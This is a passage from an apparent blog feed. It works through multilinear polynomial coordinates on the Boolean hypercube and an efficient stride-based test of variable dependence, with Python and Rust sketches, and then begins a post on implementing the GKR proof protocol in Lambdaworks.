&lt;p&gt;This algorithm exploits the fact that over the corresponding interpolation basis, the coordinates are none but the evaluation of the polynomial in the designated point in the hypercube, just as in the previous section.&lt;&#x2F;p&gt;
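&lt;p&gt;The recursion can be sketched in a few lines of Python (our own function names; polynomials are passed as plain callables), splitting on the first variable so that the concatenation reproduces the MSB-first binary order adopted earlier:&lt;&#x2F;p&gt;

```python
def multilinear_coords(g, num_vars):
    # Coordinates of a multilinear polynomial in the interpolation
    # (Lagrange) basis: split on the first variable, recurse on the
    # two coefficient polynomials, then concatenate.
    if num_vars == 0:
        return [g()]  # g is a constant
    # C_0 and C_1 fix the first remaining variable to 0 and 1.
    c0 = lambda *rest: g(0, *rest)
    c1 = lambda *rest: g(1, *rest)
    return (multilinear_coords(c0, num_vars - 1)
            + multilinear_coords(c1, num_vars - 1))

g = lambda x1, x2: 1 + x1 + x1 * x2
print(multilinear_coords(g, 2))  # -> [1, 1, 2, 3]
```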
&lt;p&gt;To illustrate let’s pick up our previous example. For our toy polynomial&lt;&#x2F;p&gt;
&lt;p&gt;$$h = X_1 + X_1 X_3 + 2X_2 X_3 X_4 + 2X_4$$&lt;&#x2F;p&gt;
&lt;p&gt;we computed its coordinates in the interpolation basis in the variables $X_3, X_4$, obtaining:&lt;&#x2F;p&gt;
&lt;p&gt;$$\left[ X_1, 2+X_1, 2X_1, 2 + 2X_1 + 2X_2 \right]$$&lt;&#x2F;p&gt;
&lt;p&gt;Now we go on by obtaining the coordinates of each of these polynomials in the multilinear interpolation basis for the variables $X_1$ and $X_2$:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Coordinates for $X_1$:&lt;&#x2F;strong&gt; we evaluate $X_1$ at each of the points of the boolean square in binary order ($X_1$ being the most significant bit), obtaining&lt;br &#x2F;&gt;
$$X_1\longleftrightarrow \left[0, 0, 1, 1 \right]$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Coordinates for $2 + X_1$:&lt;&#x2F;strong&gt; we evaluate $2 + X_1$ at each of the points of the boolean square, obtaining&lt;br &#x2F;&gt;
$$2 + X_1\longleftrightarrow \left[2, 2, 3, 3 \right]$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Coordinates for $2X_1$:&lt;&#x2F;strong&gt; repeating the idea we get&lt;br &#x2F;&gt;
$$2X_1\longleftrightarrow \left[0, 0, 2, 2 \right]$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Coordinates for $2 + 2X_1 + 2X_2$:&lt;&#x2F;strong&gt; finally, evaluating at the points of the boolean square in binary order,&lt;br &#x2F;&gt;
$$2 + 2X_1 + 2X_2 \longleftrightarrow \left[2, 4, 4, 6 \right]$$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The concatenation of these final coordinates gives us the 16 evaluations of the polynomial $h$ on the hypercube $\{0,1\}^4$, here ordered with $X_3, X_4$ as the most significant coordinates since we interpolated in those variables first:&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{coords}(h) = \text{concat}([0,0,1,1], [2,2,3,3], [0,0,2,2], [2,4,4,6] )$$&lt;&#x2F;p&gt;
&lt;p&gt;this is,&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{coords}(h) = [0,0,1,1,2,2,3,3,0,0,2,2,2,4,4,6]$$&lt;&#x2F;p&gt;
&lt;p&gt;This can easily be verified by evaluating $h$ directly. We’ve shown this procedure forwards, but it also gives us a quick way of reading off coordinates by simply eyeballing sub-vectors in the original string of coordinates. More on this later.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;products-of-multilinear-polynomials&quot;&gt;Products of multilinear polynomials&lt;&#x2F;h2&gt;
&lt;p&gt;As we’ve seen already, the set of multilinear polynomials in $\ell$ variables is indeed a vector space over the base field. However, the product of multilinear polynomials fails, in general, to be a multilinear polynomial.&lt;br &#x2F;&gt;
Suppose now that&lt;&#x2F;p&gt;
&lt;p&gt;$$g = \prod\limits_{ k = 1 }^d p_k$$&lt;&#x2F;p&gt;
&lt;p&gt;where the factors $p_k$ are all multilinear polynomials in $X_1,\ldots X_\ell$. By picking a variable $X_i$ we can view the product as a general polynomial in $X_i$ and coefficients in the ring of polynomials in the remaining variables.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Fact number 5:&lt;&#x2F;strong&gt; The degree of $g$ as a polynomial in $X_i$ is the sum of the degrees in $X_i$ of the factors $p_k$; this can be determined by deciding whether each polynomial $p_k$ has $X_i$ as a variable.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;So if we want to determine the degree of $g$ in the variable $X_i$, we need to check whether each multilinear factor includes this variable or not. We can decide this with a rudimentary, evaluation-based test: a multilinear polynomial $p(X_1, \dots, X_\ell)$ does &lt;strong&gt;not&lt;&#x2F;strong&gt; include the variable $X_k$ if and only if its value remains constant when we flip the value of $X_k$ from 0 to 1 while keeping all other variables fixed. That is:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Fact number 6:&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
$$p(x_1, \dots, x_{k - 1}, 0, x_{k + 1}, \dots, x_\ell) = p(x_1, \dots, x_{k - 1}, 1, x_{k + 1}, \dots, x_\ell)$$&lt;br &#x2F;&gt;
for all $x_j \in \{0,1 \}$ with $j \neq k$ $\iff$ $p$ does not depend on $X_k$.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;To illustrate this fact, suppose we have&lt;&#x2F;p&gt;
&lt;p&gt;$$p(X_1, X_2, X_3) = X_1 (X_2 + X_3)$$&lt;&#x2F;p&gt;
&lt;p&gt;and we want to test if this polynomial includes the variable &lt;strong&gt;$X_3$&lt;&#x2F;strong&gt;. The test requires us to check if $$p(X_1, X_2, 0) = p(X_1, X_2, 1)$$ for all possible combinations of $(X_1, X_2) \in \{0,1 \}^2$.&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;First we check $(x_1, x_2) = (0, 0)$:&lt;&#x2F;strong&gt;
&lt;ul&gt;
&lt;li&gt;$p(0, 0, 0) = 0(0 + 0) = 0$&lt;&#x2F;li&gt;
&lt;li&gt;$p(0, 0, 1) = 0(0 + 1) = 0$&lt;&#x2F;li&gt;
&lt;li&gt;The equality holds; observe that if the algorithm stopped here, it would wrongly conclude that the polynomial does not depend on $X_3$. Checking equality at all points of the hypercube is necessary.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Now check $(x_1, x_2) = (1, 0)$:&lt;&#x2F;strong&gt;
&lt;ul&gt;
&lt;li&gt;$p(1, 0, 0) = 1(0 + 0) = 0$&lt;&#x2F;li&gt;
&lt;li&gt;$p(1, 0, 1) = 1(0 + 1) = 1$&lt;&#x2F;li&gt;
&lt;li&gt;The equality &lt;strong&gt;fails&lt;&#x2F;strong&gt;.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;Because the equality fails for at least one case, an algorithm comparing evaluations correctly concludes that the variable $X_3$ &lt;strong&gt;is&lt;&#x2F;strong&gt; included in the polynomial.&lt;&#x2F;p&gt;
&lt;p&gt;Since we’ve spent some time discussing the connection between evaluations on the hypercube and coordinates over the multilinear interpolation basis - how can we make use of what we already know?&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Concretely, can we come up with an algorithm to decide whether a certain multilinear polynomial includes a specific variable or not, in a way that the algorithm exploits the recursive nature of the coordinates in the multilinear interpolation basis and the ordering of the hypercube?&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Since evaluations are none other than coordinates in the multilinear interpolation basis, performing the test we mentioned before amounts to inspecting different entries of the coordinate vector.&lt;&#x2F;p&gt;
&lt;p&gt;And how is this possible? Well, the first step is realizing that there is a relation between the position on the coordinate vector and the value of a variable $X_i$. For instance, take the polynomial $$g(X_1, X_2, X_3) = X_1 + X_3$$ which clearly does not depend on $X_2$. Its coordinate vector is:&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{coords}(g) = [0, 1, 0, 1, 1, 2, 1, 2]$$&lt;&#x2F;p&gt;
&lt;p&gt;The first half of the vector corresponds to evaluations over points in the hypercube with $X_1=0$ and the second half corresponds to evaluations over points with $X_1=1$. In this way we split the coordinates in two chunks of half the size and proceed to compare those strings:&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{coords}(g_{ X_1 = 0}) = [0, 1, 0, 1],\quad \text{coords}(g_{ X_1 = 1 }) = [1, 2, 1, 2]$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;As a brief comment: it is worth mentioning that these new strings of evaluations correspond to the coordinates of the multilinear polynomials that act as coefficients of $g$ as discussed in the earlier sections: they are the coordinates of $C_0^1 (X_2 , X_3)$ and $C_1^1 (X_2 , X_3)$ in the equality&lt;&#x2F;em&gt; $$g(X_1, X_2 , X_3 ) = C_0^1 (X_2 , X_3) ( 1 - X_1 ) + C_1^1 (X_2 , X_3) X_1$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;But let’s stick to the coordinates. We now scan these pieces: since they differ in the first position, we correctly conclude that $g$ depends on $X_1$.&lt;&#x2F;p&gt;
&lt;p&gt;Next we have to decide whether $X_2$ is present in $g$: we can now identify these two sub-vectors as coordinates in the multilinear interpolation basis for the variables $X_2$ and $X_3$, and call this test again on both pieces. We split both in two halves, corresponding to the evaluations $X_2 = 0$ and $X_2 = 1$:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;the coordinates of $C^1_0 (X_2,X_3)$ are $\text{coords}(C^1_0 ) = [0, 1, 0, 1]$ and split into $[0, 1]$ and $[0, 1]$&lt;&#x2F;li&gt;
&lt;li&gt;the coordinates of $C^1_1 (X_2 , X_3)$ are $\text{coords}(C^1_1 ) = [1, 2, 1, 2]$ and split into $[1, 2]$ and $[1, 2]$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;in both cases, the sub-vectors coincide and this means that in effect, $X_2$ is not present in $g$.&lt;&#x2F;p&gt;
&lt;p&gt;Finally to decide for $X_3$ we perform the same test on each of the 4 pieces obtained in the last step. It is easy to see that splitting $[0, 1]$ yields the scalar vectors&lt;&#x2F;p&gt;
&lt;p&gt;$$[0]\quad\text{and}\quad [1] $$&lt;&#x2F;p&gt;
&lt;p&gt;which are obviously different and so $g$ effectively contains the variable $X_3$.&lt;&#x2F;p&gt;
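&lt;p&gt;The halving procedure we just walked through can be written as a short recursive routine operating directly on the coordinate vector (a sketch; &lt;code&gt;depends_on&lt;&#x2F;code&gt; is our own name):&lt;&#x2F;p&gt;

```python
def depends_on(coords, var_index):
    # Does the multilinear polynomial with these Lagrange-basis
    # coordinates depend on X_{var_index}? (1-based, X_1 is the MSB.)
    # Split the vector in halves (X_1 = 0 vs X_1 = 1) and either
    # compare them or recurse into both, as in the text.
    half = len(coords) // 2
    if var_index == 1:
        return coords[:half] != coords[half:]
    return (depends_on(coords[:half], var_index - 1)
            or depends_on(coords[half:], var_index - 1))

# g(X1, X2, X3) = X1 + X3 from the text.
cs = [0, 1, 0, 1, 1, 2, 1, 2]
print([depends_on(cs, k) for k in (1, 2, 3)])  # -> [True, False, True]
```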
&lt;p&gt;In this example, we organized the routine in a “divide and conquer” fashion, which is already appealing: we inspect equality starting at the most significant bit (MSB) and work by halving string sizes towards the least significant bit (LSB), $X_3$. However, this is not the only way the inspection can be done; as a matter of fact, for memory-access reasons it is more convenient to assess variables &lt;em&gt;in reverse order of significance&lt;&#x2F;em&gt;. On the one hand this kills the divide-and-conquer approach, but it yields better performance: modern computers access memory in contiguous blocks (cache), and the divide-and-conquer approach we discussed compares positions that are far apart in the original vector: $g(0)$ is compared to $g(4)$, $g(1)$ is compared to $g(5)$, and so on, which is costly in terms of performance. How do we cook up a way of exploiting contiguity?&lt;&#x2F;p&gt;
&lt;p&gt;A good way of making use of contiguity is by the use of &lt;em&gt;strides&lt;&#x2F;em&gt;. The coordinate vector is ordered lexicographically, which means the indices of the elements correspond to the binary representation of integers, from 0 to $2^l - 1$. In this convention, each polynomial variable, $X_k$, is associated with a specific bit in the binary representation of the coordinates.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;em&gt;stride&lt;&#x2F;em&gt; for variable $X_k$ is simply the &lt;strong&gt;positional weight&lt;&#x2F;strong&gt; of its bit in the binary representation: in other words, how much the $k$-th bit contributes to the position in the hypercube. For a polynomial&lt;br &#x2F;&gt;
$$g(X_1, X_2, X_3)$$&lt;br &#x2F;&gt;
with an 8-element coordinate vector, the &lt;em&gt;stride&lt;&#x2F;em&gt; aligns with the inspection of each variable:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **For $X_3$ (LSB):** To change the value of $X_3$ from 0 to 1, we only need to change the least significant bit. The weight of this bit is $2^0 = 1$. Therefore, the _stride_ for $X_3$ is **1**. The test compares pairs of adjacent coordinates, such as $v_0$ with $v_1$ (corresponding to $000$ and $001$).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **For $X_2$:** To change the value of $X_2$ from 0 to 1, we need to change the middle bit. The weight of this bit is $2^1 = 2$. Therefore, the _stride_ for $X_2$ is **2**. The test compares pairs of coordinates that are 2 positions apart, such as $v_0$ with $v_2$ (corresponding to $000$ and $010$).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **For $X_1$ (MSB):** To change the value of $X_1$ from 0 to 1, we need to change the most significant bit. The weight of this bit is $2^2 = 4$. Therefore, the _stride_ for $X_1$ is **4**. The test compares pairs of coordinates that are 4 positions apart, such as $v_0$ with $v_4$ (corresponding to $000$ and $100$).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;blockquote&gt;
&lt;p&gt;The &lt;em&gt;stride&lt;&#x2F;em&gt; works as an algorithmic shortcut to find the pairs of coordinates that only differ in the variable you are testing, by leveraging the structure of the binary encoding.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Using the stride for each variable, we now have an efficient way of scanning the coordinate vector. The pseudocode of such an algorithm is not complicated:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Inputs:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * _coords_ : A vector of $2^l$ coordinates (evaluations) of the polynomial $g$ on the hypercube ${0,1}^l$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * _l_ : The total number of variables in the polynomial ($X_1$ to $X_l$).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;Intermediate Parameters:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * _stride_ : The step or distance between the coordinates being compared. Its value is $2^{l-k}$ for variable $X_k$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * _number of blocks_ : The coordinate vector splits into blocks of size $2 \cdot \text{stride}$; for variable $X_k$ there are $2^{k - 1}$ of them.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;blockquote&gt;
&lt;p&gt;The algorithm &lt;em&gt;DecideDependence_LSBFirst(coords, l)&lt;&#x2F;em&gt; is executed as follows:&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. For each variable $X_k$ (iterating from $k = l$ down to $1$):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Calculate _stride_ $= 2^{l - k}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Set a flag _depends_ to _FALSE_.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Iterate over block starts, from $j = 0$ to $j = 2^{l} - 1$, with a step of $2 \cdot \text{stride}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Within each block, compare the coordinates _coords[j + m]_ and _coords[j + m + stride]_ for every offset $m = 0, \dots, \text{stride} - 1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. If any such pair differs, set _depends_ to _TRUE_ and exit both loops.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. Report the result of _depends_ for variable $X_k$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
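&lt;p&gt;The routine above translates almost line for line into code. Below is a minimal Rust sketch (illustrative only, not taken from any library); note the inner loop over the offsets $m$, which guarantees that every pair of coordinates differing only in the $k$-th bit gets compared:&lt;&#x2F;p&gt;

```rust
/// Decide, for each variable X_k (k = 1..=l), whether the polynomial given by
/// its 2^l hypercube evaluations depends on X_k. Coordinates are ordered
/// lexicographically, with X_1 as the most significant bit of the index.
fn decide_dependence_lsb_first(coords: &[u64], l: u32) -> Vec<bool> {
    assert_eq!(coords.len(), 1usize << l);
    let mut result = vec![false; l as usize];
    // k = l is the LSB (stride 1); k = 1 is the MSB (stride 2^{l-1}).
    for k in (1..=l).rev() {
        let stride = 1usize << (l - k);
        let mut depends = false;
        // Blocks of size 2 * stride are contiguous in memory; within each
        // block, the two halves differ exactly in the k-th bit.
        'scan: for block in (0..coords.len()).step_by(2 * stride) {
            for m in 0..stride {
                if coords[block + m] != coords[block + m + stride] {
                    depends = true;
                    break 'scan;
                }
            }
        }
        result[k as usize - 1] = depends;
    }
    result
}
```

&lt;p&gt;On the 8-element vector $[0, 1, 0, 1, 1, 2, 1, 2]$ this reports the dependence flags $[\text{true}, \text{false}, \text{true}]$ for $(X_1, X_2, X_3)$.&lt;&#x2F;p&gt;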
&lt;p&gt;As an example with absolutely no surprises, here’s the application to the polynomial $$g(X_1, X_2, X_3) = X_1 + X_3$$&lt;&#x2F;p&gt;
&lt;p&gt;We will use the same 8-element coordinate vector for $g$:&lt;br &#x2F;&gt;
$$\text{coords}(g) = [0, 1, 0, 1, 1, 2, 1, 2]$$&lt;&#x2F;p&gt;
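&lt;p&gt;As a quick sanity check, this vector can be generated directly from the bits of each index; here is a hypothetical one-liner in Rust, assuming the lexicographic convention above with $X_1$ as the most significant bit:&lt;&#x2F;p&gt;

```rust
// Evaluate g(X1, X2, X3) = X1 + X3 at every point of {0,1}^3, in
// lexicographic order: for index i, X1 is bit 2 and X3 is bit 0.
fn coords_of_g() -> Vec<u64> {
    (0u64..8).map(|i| ((i >> 2) & 1) + (i & 1)).collect()
}
```

&lt;p&gt;This reproduces the vector $[0, 1, 0, 1, 1, 2, 1, 2]$ above.&lt;&#x2F;p&gt;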
&lt;h3 id=&quot;1-decision-for-x-3-k-3&quot;&gt;1. Decision for $X_3$ ($k = 3$)&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. _stride_ = $2^{ 3 - 3} = 1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The algorithm compares the pairs _(coords[j], coords[j+1])_ for $j = 0, \dots, 6$ with a step of 2.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. For $j = 0$: _coords[0] (0)_ vs. _coords[1] (1)_. Since $0 \neq 1$, the test fails.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. **Conclusion:** $g$ **depends** on $X_3$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;2-decision-for-x-2-k-2&quot;&gt;2. Decision for $X_2$ ($k = 2$)&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. _stride_ = $2^{ 3 - 2} = 2$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The algorithm compares the pairs _(coords[j], coords[j + 2])_ within each block of 4 elements, i.e., for $j = 0, 1$ and $j = 4, 5$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. For $j = 0$: _coords[0] (0)_ vs. _coords[2] (0)_. They are equal.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. For $j = 1$: _coords[1] (1)_ vs. _coords[3] (1)_. They are equal.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. For $j = 4$: _coords[4] (1)_ vs. _coords[6] (1)_. They are equal.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. For $j = 5$: _coords[5] (2)_ vs. _coords[7] (2)_. They are equal.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. **Conclusion:** $g$ **does not depend** on $X_2$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;3-decision-for-x-1-k-1&quot;&gt;3. Decision for $X_1$ ($k = 1$)&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. _stride_ = $2^{ 3 - 1} = 4$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The algorithm compares the pairs _(coords[j], coords[j+4])_ for $j = 0, \dots, 3$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. For $j = 0$: _coords[0] (0)_ vs. _coords[4] (1)_.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Since $0 \neq 1$, the test fails.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. **Conclusion:** $g$ **depends** on $X_1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This is obviously the same result as above, but the comparisons are now executed over contiguous memory, which makes this algorithm preferable.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-comes-next&quot;&gt;What comes next&lt;&#x2F;h2&gt;
&lt;p&gt;Next, we will employ these ideas to understand the algorithms proposed by Bagad, Dao, Domb and Thaler in their recent article “Speeding up sum-check proving”, where they explore different implementations of the sumcheck protocol for polynomials of the shape just described: products of multilinear polynomials. They investigate and exploit the different multiplication and addition costs involved in the interaction between base field elements and random field elements at each step of the protocol, which requires clever manipulation and a solid understanding of multilinear polynomials and their properties.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>GKR protocol implementation: deep dive into the code</title>
          <pubDate>Tue, 22 Jul 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/gkr-protocol-implementation-deep-dive-into-the-code/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/gkr-protocol-implementation-deep-dive-into-the-code/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/gkr-protocol-implementation-deep-dive-into-the-code/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;The &lt;strong&gt;GKR&lt;&#x2F;strong&gt; (Goldwasser–Kalai–Rothblum) protocol provides an efficient way to verify computations over arithmetic circuits, avoiding re-execution and reducing the verifier’s work. In our previous post, &lt;a href=&quot;&#x2F;gkr-protocol-a-step-by-step-example&#x2F;&quot;&gt;GKR protocol: a step-by-step example&lt;&#x2F;a&gt;, we explored how the protocol works in detail, focusing on its mathematical structure and walking through a concrete hand-worked example. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1284&quot;&gt;GKR&lt;&#x2F;a&gt; is currently used to improve the performance of lookup arguments, which are crucial for proving the execution of zero-knowledge virtual machines.&lt;&#x2F;p&gt;
&lt;p&gt;The goal of this post is to explain &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;1011&quot;&gt;our implementation&lt;&#x2F;a&gt; of the protocol in Lambdaworks, showing how arithmetic circuits are described and validated, and how the prover and verifier operate in practice. We’ll also see how the &lt;strong&gt;Fiat-Shamir transform&lt;&#x2F;strong&gt; is applied to make the protocol &lt;strong&gt;non-interactive&lt;&#x2F;strong&gt; , and how the &lt;strong&gt;Sumcheck protocol&lt;&#x2F;strong&gt; is adapted and integrated as the core component for verifying each circuit layer.&lt;&#x2F;p&gt;
&lt;p&gt;If you’re not familiar with the protocol or need a refresher, we recommend starting with our previous post linked above.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Warning:&lt;&#x2F;strong&gt; The GKR implementation presented here is for educational purposes only and should not be used in production. Note that for more general circuits, the protocol is vulnerable to practical attacks, as it relies on the Fiat-Shamir transform (see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2025&#x2F;118.pdf&quot;&gt;“How to Prove False Statements”&lt;&#x2F;a&gt;).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;circuit-structure&quot;&gt;Circuit Structure&lt;&#x2F;h2&gt;
&lt;p&gt;A GKR circuit is composed of layers. Each layer contains gates, and each gate operates on outputs from the previous layer. Gates can be either addition or multiplication. For protocol compatibility, each layer must have a power-of-two number of gates.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;BkLEjCjIlx.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;br &#x2F;&gt;
&lt;em&gt;The arithmetic circuit used in the previous post as an example&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In some cases, we can work with more efficient versions if all the gates are, for example, multiplications.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;circuit-api&quot;&gt;Circuit API&lt;&#x2F;h3&gt;
&lt;p&gt;The main structures for circuit construction are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `Circuit` — Consists of a vector of layers (ordered from top to bottom, starting at the output layer and not including the input layer); the number of inputs; and the number of variables needed to index the input layer.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          pub struct Circuit {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              &#x2F;&#x2F;&#x2F; First layer is the output layer. It doesn&amp;#39;t include the input layer.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
